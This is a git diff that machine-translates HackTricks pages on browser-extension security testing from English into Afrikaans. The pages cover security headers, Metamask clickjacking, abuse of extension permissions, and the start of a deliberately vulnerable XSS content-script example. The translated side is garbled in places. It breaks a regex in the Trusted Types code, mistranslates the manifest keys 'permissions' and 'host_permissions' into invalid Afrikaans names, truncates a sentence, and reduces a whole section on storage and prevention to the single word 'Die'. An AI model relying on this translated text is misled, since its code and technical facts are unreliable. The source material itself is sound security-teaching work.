+* Die **`Content-Disposition`**-kop in HTTP-reaksies bepaal of 'n lêer **inline** (binne die webblad) vertoon moet word of as 'n **bylaag** (afgelaai) behandel moet word. Byvoorbeeld:
 ```
 Content-Disposition: attachment; filename="filename.jpg"
 ```
-This means the file named "filename.jpg" is intended to be downloaded and saved.
+Dit beteken die lêernaam "filename.jpg" is bedoel om afgelaai en gestoor te word.
 
-## Security Headers
+## Sekuriteitskoppe
 
-### Content Security Policy (CSP) 
+### Inhoud Sekuriteitsbeleid (CSP) 
 
 {% content-ref url="../../pentesting-web/content-security-policy-csp-bypass/" %}
 [content-security-policy-csp-bypass](../../pentesting-web/content-security-policy-csp-bypass/)
 {% endcontent-ref %}
 
-### **Trusted Types**
-
-By enforcing Trusted Types through CSP, applications can be protected against DOM XSS attacks. Trusted Types ensure that only specifically crafted objects, compliant with established security policies, can be used in dangerous web API calls, thereby securing JavaScript code by default.
+### **Vertroue Tipes**
 
+Deur Vertroue Tipes af te dwing deur middel van CSP, kan programme beskerm word teen DOM XSS-aanvalle. Vertroue Tipes verseker dat slegs spesifiek ontwerpte voorwerpe, wat voldoen aan vasgestelde sekuriteitsbeleide, gebruik kan word in gevaarlike web API-oproepe, en sodoende JavaScript-kode standaard beveilig.
 ```javascript
 // Feature detection
 if (window.trustedTypes && trustedTypes.createPolicy) {
-  // Name and create a policy
-  const policy = trustedTypes.createPolicy('escapePolicy', {
-    createHTML: str => str.replace(/\/g, '>');
-  });
+// Name and create a policy
+const policy = trustedTypes.createPolicy('escapePolicy', {
+createHTML: str => str.replace(/\/g, '>');
+});
 }
 ```
 
@@ -157,51 +153,40 @@ el.innerHTML = 'some string'; // Throws an exception.
 const escaped = policy.createHTML('');
 el.innerHTML = escaped;  // Results in safe assignment.
 ```
+### **X-Inhouds-Tipe-Keuses**
 
-### **X-Content-Type-Options**
-
-This header prevents MIME type sniffing, a practice that could lead to XSS vulnerabilities. It ensures that browsers respect the MIME types specified by the server.
-
+Hierdie kop voorkom MIME-tipe sniffing, 'n praktyk wat kan lei tot XSS kwesbaarhede. Dit verseker dat webblaaier die MIME-tipes wat deur die bediener gespesifiseer is, respekteer.
 ```
 X-Content-Type-Options: nosniff
 ```
-
 ### **X-Frame-Options**
 
-To combat clickjacking, this header restricts how documents can be embedded in ``, `
 ```
+## Metamask Voorbeeld
 
-## Metamask Example
-
-A [**blog post about a ClickJacking in metamask can be found here**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9). In this case, Metamask fixed the vulnerability by checking that the protocol used to access it was **`https:`** or **`http:`** (not **`chrome:`** for example):
+'n [**Blogpos oor 'n ClickJacking in Metamask kan hier gevind word**](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9). In hierdie geval het Metamask die kwesbaarheid reggestel deur te kontroleer dat die protokol wat gebruik word om dit te benader, **`https:`** of **`http:`** was (nie byvoorbeeld **`chrome:`** nie):
 
 

 
-**Another ClickJacking fixed** in the Metamask extension was that users were able to **Click to whitelist** when a page was suspicious of being phishing because of `“web_accessible_resources”: [“inpage.js”, “phishing.html”]`. As that page was vulnerable to Clickjacking, an attacker could abuse it showing something normal to make the victim click to whitelist it without noticing, and then going back to the phishing page which will be whitelisted.
+**'n Ander ClickJacking wat reggestel is** in die Metamask-uitbreiding was dat gebruikers kon **Klik om te witlys** wanneer 'n bladsy verdag was om 'n phising-poging te wees as gevolg van `“web_accessible_resources”: [“inpage.js”, “phishing.html”]`. Aangesien daardie bladsy vatbaar was vir Clickjacking, kon 'n aanvaller dit misbruik deur iets normaals te wys om die slagoffer te laat klik om dit wit te lys sonder om dit te besef, en dan terug te keer na die phising-bladsy wat witgelys sal wees.
 
-## Steam Inventory Helper Example
+## Steam Inventory Helper Voorbeeld
 
-Check the following page to check how a **XSS** in a browser extension was chained with a **ClickJacking** vulnerability:
+Kyk na die volgende bladsy om te sien hoe 'n **XSS** in 'n blaaieruitbreiding gekoppel is aan 'n **ClickJacking**-kwesbaarheid:
 
 {% content-ref url="browext-xss-example.md" %}
 [browext-xss-example.md](browext-xss-example.md)
 {% endcontent-ref %}
 
-## References
+## Verwysings
 
 * [https://blog.lizzie.io/clickjacking-privacy-badger.html](https://blog.lizzie.io/clickjacking-privacy-badger.html)
 * [https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9](https://slowmist.medium.com/metamask-clickjacking-vulnerability-analysis-f3e7c22ff4d9)
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

diff --git a/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md b/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
index 61385f93d..6faf83a25 100644
--- a/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
+++ b/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md
@@ -1,141 +1,124 @@
-# BrowExt - permissions & host\_permissions
+# BrowExt - toestemmings & host_toestemmings
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
-## Basic Information
+## Basiese Inligting
 
-### **`permissions`**
+### **`toestemmings`**
 
-Permissions are defined in the extension's **`manifest.json`** file using the **`permissions`** property and allow access to almost anything a browser can access (Cookies or Physical Storage):
+Toestemmings word in die uitbreiding se **`manifest.json`**-lêer gedefinieer deur die **`toestemmings`**-eienskap en gee toegang tot byna enige iets waartoe 'n webblaaier toegang kan verkry (Koekies of Fisiese Berging):
 
-The previous manifest declares that the extension requires the `storage` permission. This means that it can use [the storage API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage) to store its data persistently. Unlike cookies or `localStorage` APIs which give users some level of control, **extension storage can normally only be cleared by uninstalling the extension**.
+Die vorige manifest verklaar dat die uitbreiding die `storage`-toestemming benodig. Dit beteken dat dit die [berging-API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage) kan gebruik om sy data volhoubaar te stoor. Anders as koekies of `localStorage`-API's wat gebruikers 'n mate van beheer gee, kan **uitbreidingsberging normaalweg slegs deur die uitbreiding te deïnstalleer, skoongemaak word**.
 
-An extension will request the permissions indicated in its **`manifest.json`** file and After installing the extension, you can **always check its permissions in your browser**, as shown in this image:
+'n Uitbreiding sal die toestemmings wat in sy **`manifest.json`**-lêer aangedui word, aanvra en nadat die uitbreiding geïnstalleer is, kan jy **altyd sy toestemmings in jou webblaaier nagaan**, soos in hierdie prentjie gewys word:
 
 

 
-You can find the [**complete list of permissions a Chromium Browser Extension can request here**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions) and a [**complete list for Firefox extensions here**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api\_permissions)**.**
+Jy kan die [**volledige lys van toestemmings wat 'n Chromium-webblaaieruitbreiding kan aanvra, hier vind**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions) en 'n [**volledige lys vir Firefox-uitbreidings hier**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api_permissions)**.**
 
-### `host_permissions`
+### `host_toestemmings`
 
-The optional but powerful setting **`host_permissions`** indicates with which hosts the extension is going to be able to interact via apis such as [`cookies`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/cookies), [`webRequest`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/webRequest), and [`tabs`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs).
-
-The following `host_permissions` basically allow every web:
+Die opsionele maar kragtige instelling **`host_toestemmings`** dui aan met watter gasheerbedieners die uitbreiding in staat sal wees om te interaksieer via API's soos [`koekies`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/cookies), [`webRequest`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/webRequest), en [`tabs`](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs).
 
+Die volgende `host_toestemmings` maak basies elke webblaaier moontlik:
 ```json
 "host_permissions": [
-  "*://*/*"
+"*://*/*"
 ]
 
 // Or:
 "host_permissions": [
-  "http://*/*",
-  "https://*/*"
+"http://*/*",
+"https://*/*"
 ]
 
 // Or:
 "host_permissions": [
-  ""
+""
 ]
 ```
+Hierdie is die gasheer wat die webblaaier-uitbreiding vrylik kan toegang. Dit is omdat wanneer 'n webblaaier-uitbreiding **`fetch("https://gmail.com/")`** roep, dit nie beperk word deur CORS nie.
 
-These are the hosts that the browser extension can access freely. This is because when a browser extension calls **`fetch("https://gmail.com/")`** it's not restricted by CORS.
+## Misbruik van `permissions` en `host_permissions`
 
-## Abusing `permissions` and `host_permissions`
+### Vlakke
 
-### Tabs
-
-Moreover, **`host_permissions`** also unlock “advanced” [**tabs API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) **functionality.** They allow the extension to call [tabs.query()](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/query) and not only get a **list of user’s browser tabs** back but also learn which **web page (meaning address and title) is loaded**.
+Verder ontgrendel **`host_permissions`** ook "gevorderde" [**tabs API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs) **funksionaliteit.** Dit stel die uitbreiding in staat om [tabs.query()](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/query) te roep en nie net 'n **lys van die gebruiker se blaaier-vlakke** terug te kry nie, maar ook te leer watter **webbladsy (beteken adres en titel) gelaai is**.
 
 {% hint style="danger" %}
-Not only that, listeners like [**tabs.onUpdated**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/onUpdated) **become way more useful as well**. These will be notified whenever a new page loads into a tab.
+Nie net dit nie, luisteraars soos [**tabs.onUpdated**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/onUpdated) **word ook baie nuttiger**. Hierdie sal in kennis gestel word wanneer 'n nuwe bladsy in 'n vlak gelaai word.
 {% endhint %}
 
-### Running content scripts 
+### Uitvoering van inhoudskripte 
 
-Content scripts aren’t necessarily written statically into the extension manifest. Given sufficient **`host_permissions`**, **extensions can also load them dynamically by calling** [**tabs.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/executeScript) **or** [**scripting.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/scripting/executeScript).
+Inhoudskripte word nie noodwendig staties in die uitbreidings-manifest geskryf nie. Met voldoende **`host_permissions`** kan uitbreidings hulle ook dinamies laai deur [**tabs.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/executeScript) **of** [**scripting.executeScript()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/scripting/executeScript) te roep.
 
-Both APIs allow executing not merely files contained in the extensions as content scripts but also **arbitrary cod**e. The former allows passing in JavaScript code as a string while the latter expects a JavaScript function which is less prone to injection vulnerabilities. Still, both APIs will wreak havoc if misused.
+Beide API's maak dit moontlik om nie net lêers wat in die uitbreiding as inhoudskripte ingesluit is nie, maar ook **willekeurige kode** uit te voer. Die eerste maak dit moontlik om JavaScript-kode as 'n string in te voer, terwyl die laaste 'n JavaScript-funksie verwag wat minder vatbaar is vir inspuitingskwesbaarhede. Tog sal beide API's skade aanrig as dit verkeerd gebruik word.
 
 {% hint style="danger" %}
-In addition to the capabilities above, content scripts could for example **intercept credentials** as these are entered into web pages. Another classic way to abuse them is **injecting advertising** on each an every website. Adding **scam messages** to abuse credibility of news websites is also possible. Finally, they could **manipulate banking** websites to reroute money transfers.
+Bo en behalwe die bogenoemde vermoëns, kan inhoudskripte byvoorbeeld ook **geloofsbriewe onderskep** soos dit in webbladsye ingevoer word. 'n Klassieke manier om hulle te misbruik, is om **advertensies in te spuit** op elke webwerf. Dit is ook moontlik om **bedrieglike boodskappe** by te voeg om die geloofwaardigheid van nuuswebwerwe te misbruik. Uiteindelik kan hulle **bankwebwerwe manipuleer** om geldoordragte om te lei.
 {% endhint %}
 
-### Implicit privileges 
+### Implisiete voorregte 
 
-Some extension privileges **don’t have to be explicitly declared**. One example is the [tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs): its basic functionality is accessible without any privileges whatsoever. Any extension can be notified when you open and close tabs, it merely won’t know which website these tabs correspond with.
+Sommige uitbreidingsvoorregte **hoef nie eksplisiet verklaar te word nie**. Een voorbeeld hiervan is die [tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs): sy basiese funksionaliteit is toeganklik sonder enige voorregte. Enige uitbreiding kan in kennis gestel word wanneer jy vlakke oopmaak en sluit, dit sal eenvoudig nie weet met watter webwerf hierdie vlakke ooreenstem nie.
 
-Sounds too harmless? The [tabs.create() API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/create) is somewhat less so. It can be used to **create a new tab**, essentially the same as [window.open()](https://developer.mozilla.org/en-US/docs/Web/API/Window/open) which can be called by any website. Yet while `window.open()` is subject to the **pop-up blocker, `tabs.create()` isn’t**.
+Klink dit te onskadelik? Die [tabs.create() API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/create) is ietwat minder onskadelik. Dit kan gebruik word om **'n nuwe vlak te skep**, essensieel dieselfde as [window.open()](https://developer.mozilla.org/en-US/docs/Web/API/Window/open) wat deur enige webwerf geroep kan word. Tog is `window.open()` onderhewig aan die **pop-up blokkeerder, `tabs.create()` nie**.
 
 {% hint style="danger" %}
-An extension can create any number of tabs whenever it wants.
+'n Uitbreiding kan enige aantal vlakke skep wanneer dit wil.
 {% endhint %}
 
-If you look through possible `tabs.create()` parameters, you’ll also notice that its capabilities go way beyond what `window.open()` is allowed to control. And while Firefox doesn’t allow `data:` URIs to be used with this API, Chrome has no such protection. **Use of such URIs on the top level has been** [**banned due to being abused for phishing**](https://bugzilla.mozilla.org/show\_bug.cgi?id=1331351)**.**
+As jy deur moontlike `tabs.create()`-parameters kyk, sal jy ook besef dat sy vermoëns verder gaan as wat `window.open()` toegelaat word om te beheer. En terwyl Firefox nie toelaat dat `data:`-URI's met hierdie API gebruik word nie, het Chrome geen sulke beskerming nie. **Die gebruik van sulke URI's op die boonste vlak is** [**verbied weens misbruik vir hengelary**](https://bugzilla.mozilla.org/show\_bug.cgi?id=1331351)**.**
 
-[**tabs.update()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/update) is very similar to `tabs.create()` but will **modify an existing tab**. So a malicious extension can for example arbitrarily load an advertising page into one of your tabs, and it can activate the corresponding tab as well.
+[**tabs.update()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/update) is baie soortgelyk aan `tabs.create()` maar sal **'n bestaande vlak wysig**. 'n Kwaadwillige uitbreiding kan byvoorbeeld arbitrêr 'n advertensiebladsy in een van jou vlakke laai, en dit kan ook die ooreenstemmende vlak aktiveer.
 
-### Webcam, geolocation and friends 
+### Webcam, geolokalisering en vriende 
 
-You probably know that websites can request special permissions, e.g. in order to access your webcam (video conferencing tools) or geographical location (maps). It’s features with considerable potential for abuse, so users each time have to confirm that they still want this.
+Jy weet waarskynlik dat webwerwe spesiale toestemmings kan vra, bv. om toegang tot jou webcam (video-konferensie-instrumente) of geografiese ligging (kaarte) te verkry. Dit is funksies met aansienlike potensiaal vir misbruik, sodat gebruikers elke keer moet bevestig dat hulle dit steeds wil hê.
 
 {% hint style="danger" %}
-Not so with browser extensions. **If a browser extension** [**wants access to your webcam or microphone**](https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia)**, it only needs to ask for permission once**
+Nie so met webblaaier-uitbreidings nie. **As 'n webblaaier-uitbreiding** [**toegang tot jou webcam of mikrofoon wil hê**](https://developer.mozilla.org/en-US/docs/Web/API/MediaDevices/getUserMedia)**, hoef dit net een keer om toestemming te vra**
 {% endhint %}
 
-Typically, an extension will do so immediately after being installed. Once this prompt is accepted, **webcam access is possible at any time**, even if the user isn’t interacting with the extension at this point. Yes, a user will only accept this prompt if the extension really needs webcam access. But after that they have to trust the extension not to record anything secretly.
+Gewoonlik sal 'n uitbreiding dit onmiddellik na installasie doen. Sodra hierdie versoek aanvaar is, is **webcam-toegang te eniger tyd moontlik**, selfs as die gebruiker nie op daardie oomblik met die uitbreiding interaksie het nie. Ja, 'n gebruiker sal hierdie versoek slegs aanvaar as die uitbreiding regtig webcam-toegang benodig. Maar daarna moet hulle die uitbreiding vertrou om niks heimlik op te neem nie.
 
-With access to [your exact geographical location](https://developer.mozilla.org/en-US/docs/Web/API/Geolocation) or [contents of your clipboard](https://developer.mozilla.org/en-US/docs/Web/API/Clipboard\_API), granting permission explicitly is unnecessary altogether. **An extension simply adds `geolocation` or `clipboard` to the** [**permissions entry**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) **of its manifest**. These access privileges are then granted implicitly when the extension is installed. So a malicious or compromised extension with these privileges can create your movement profile or monitor your clipboard for copied passwords without you noticing anything.
+Met toegang tot [jou presiese geografiese ligging](https://developer.mozilla.org/en-US/docs/Web/API/Geolocation) of [inhoud van jou knipbord](https://developer.mozilla.org/en-US/docs/Web/API/Clipboard\_API), is dit heeltemal onnodig om toestemming eksplisiet te verleen. **'n Uitbreiding voeg eenvoudig `geolocation` of `clipboard` by die** [**permissions entry**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) **van sy manifest**. Hierdie toegangsvoorregte word dan implisiet verleen wanneer die uitbreiding geïnstalleer word. Dus kan 'n kwaadwillige of gekompromitteerde uitbreiding met hierdie voorregte jou bewegingsprofiel skep of jou knipbord monitor vir gekopieerde wagwoorde sonder dat jy iets daarvan besef.
 
-Adding the **`history`** keyword to the [permissions entry](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) of the extension manifest grants **access to the** [**history API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/history). It allows retrieving the user’s entire browsing history all at once, without waiting for the user to visit these websites again.
+Deur die sleutelwoord **`history`** by die [permissions entry](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions) van die uitbreidings-manifest te voeg, word **toegang tot die** [**history API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/history) **verleen**. Dit maak dit moontlik om die gebruiker se volledige blaai-geskiedenis in een keer te herwin, sonder om te wag vir die gebruiker om hierdie webwerwe weer te besoek.
 
-The **`bookmarks`** **permission** has similar abuse potential, this one allows **reading out all bookmarks via the** [**bookmarks API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/bookmarks).
+Die **`bookmarks`** **permission** het soortgelyke misbruikspotensiaal, dit maak dit moontlik om **alle bladmerke uit te lees via die** [**bookmarks API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/bookmarks).
 
-### Storage permission 
+### Stoor-toestemming 
 
-The extension storage is merely a key-value collection, very similar to [localStorage](https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage) that any website could use. So no sensitive information should be stored here.
-
-However, advertising companies could also abuse this storage.
-
-### More permissions
-
-You can find the [**complete list of permissions a Chromium Browser Extension can request here**](https://developer.chrome.com/docs/extensions/develop/concepts/declare-permissions#permissions) and a [**complete list for Firefox extensions here**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#api\_permissions)**.**
-
-## Prevention 
-
-The policy of Google's developer explicitly forbids extensions from requesting more privileges than necessary for their functionality, effectively mitigating excessive permission requests. An instance where a browser extension overstepped this boundary involved its distribution with the browser itself rather than through an add-on store.
-
-Browsers could further curb the misuse of extension privileges. For instance, Chrome's [tabCapture](https://developer.chrome.com/docs/extensions/reference/tabCapture/) and [desktopCapture](https://developer.chrome.com/docs/extensions/reference/desktopCapture/) APIs, used for screen recording, are designed to minimize abuse. The tabCapture API can only be activated through direct user interaction, such as clicking on the extension icon, while desktopCapture requires user confirmation for the window to be recorded, preventing clandestine recording activities.
-
-However, tightening security measures often results in decreased flexibility and user-friendliness of extensions. The [activeTab permission](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/manifest.json/permissions#activetab_permission) illustrates this trade-off. It was introduced to eliminate the need for extensions to request host privileges across the entire internet, allowing extensions to access only the current tab upon explicit activation by the user. This model is effective for extensions requiring user-initiated actions but falls short for those requiring automatic or pre-emptive actions, thereby compromising convenience and immediate responsiveness.
-
-## **References**
+Die
+## **Verwysings**
 
 * [https://palant.info/2022/08/17/impact-of-extension-privileges/](https://palant.info/2022/08/17/impact-of-extension-privileges/)
 * [https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing](https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing)
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

diff --git a/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md b/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
index 74225cdba..2d3b3108e 100644
--- a/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
+++ b/pentesting-web/browser-extension-pentesting-methodology/browext-xss-example.md
@@ -1,134 +1,120 @@
-# BrowExt - XSS Example
+# BrowExt - XSS Voorbeeld
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
-## Cross-Site Scripting (XSS) through Iframe
-
-In this setup, a **content script** is implemented to instantiate an Iframe, incorporating a URL with query parameters as the source of the Iframe:
+## Cross-Site Scripting (XSS) deur middel van Iframe
 
+In hierdie opstelling word 'n **inhoudskrip** geïmplementeer om 'n Iframe te instansieer, wat 'n URL met navraagparameters inkorporeer as die bron van die Iframe:
 ```javascript
 chrome.storage.local.get("message", result => {
-  let constructedURL = chrome.runtime.getURL("message.html") +
-    "?content=" + encodeURIComponent(result.message) +
-    "&redirect=https://example.net/details";
-  frame.src = constructedURL;
+let constructedURL = chrome.runtime.getURL("message.html") +
+"?content=" + encodeURIComponent(result.message) +
+"&redirect=https://example.net/details";
+frame.src = constructedURL;
 });
 ```
-
-A publicly accessible HTML page, **`message.html`**, is designed to dynamically add content to the document body based on the parameters in the URL:
-
